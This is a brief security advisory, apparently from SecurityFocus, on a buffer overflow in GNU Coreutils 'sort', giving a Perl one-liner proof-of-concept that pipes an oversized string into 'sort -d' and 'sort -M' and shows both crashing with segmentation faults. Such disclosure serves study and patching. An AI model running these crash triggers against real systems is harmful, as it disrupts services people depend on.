GNU Coreutils 'sort' Text Utility Buffer Overflow Vulnerability

The following proof-of-concept is available:

% perl -e 'print "1","A"x50000000,"\r\n\r\n"' | sort -d
[1] 13431 done perl -e 'print "1","A"x50000000,"\r\n\r\n"' |
13432 segmentation fault sort -d

% perl -e 'print "1","A"x50000000,"\r\n\r\n"' | sort -M
[1] 13433 done perl -e 'print "1","A"x50000000,"\r\n\r\n"' |
13434 segmentation fault sort -M


 

Privacy Statement
Copyright 2010, SecurityFocus